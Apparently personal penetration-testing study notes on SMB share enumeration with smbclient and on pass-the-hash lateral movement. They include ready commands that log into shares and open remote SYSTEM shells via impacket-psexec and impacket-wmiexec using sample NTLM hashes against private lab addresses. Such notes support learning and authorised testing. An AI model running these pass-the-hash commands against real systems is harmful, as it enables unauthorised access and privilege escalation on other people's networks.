# Enumeration
- `net view \\\\dc01 /all`
		- smbclinet -L //server -U user
			- -L = lists of share names
			- -U for users
		- smbclient -L //server -U user%password
			- username & password
		- smbclient //server/share -U user%password
			- connecting to share
		- cd tgt_dir
		- lcd /myLocalDir
		- smbclient //server/share --directory path/to/directory -c 'get file.txt'
		- put [filename] ??
		- leading SMB to the Win2K or NT server
			- smbclient //server/plans -I [$ip] -W [domain_name]  -U username%password
		- --no-pass
#### Gain access to an SMB by providing NTLM hash
- smbclient

- ```
	smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
			```
	- -U = user
	- --pw-nt-hash = indicating the hash
- After connecting
	- >dir
	- >get secrets.txt
- CrackMapExec
# Attacks
- 
#### [[Impacket]]
- psexec.py
- wmiexec.py
- Using psexec.py
	- searches for a writable share and uploads an executable file to it. Then registers exe as Windows service & starts
- Using impacket-scripts to execute psexec.py
		- user friendly
		- upload .exe
		- leaves logs
	- impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
		- -hashes = hash
			- format = "LMHash:NTHash"
			- since we only use NTLM hash
				- fill LMHash section with (32) 0's
			- then username@ip
			- then command to execute
				- default or blank = cmd.exe
		- shell is always a SYSTEM user
- impacket-wmiexec
	- doesnt write to disk
	- can be used with pth-wmis for remote acces
	- ```
		impacket-wmiexec -hashes 00000000000000000000000000000000: 2a944a58d4ffa77137b2c587e6ed7626 maria@192.168.210.70
		``
### Examples
- [[Password Manager]]
- [[SSH Private Key Passphrase]]
### Scripts
- `/usr/share/nmap/scripts/smb*`
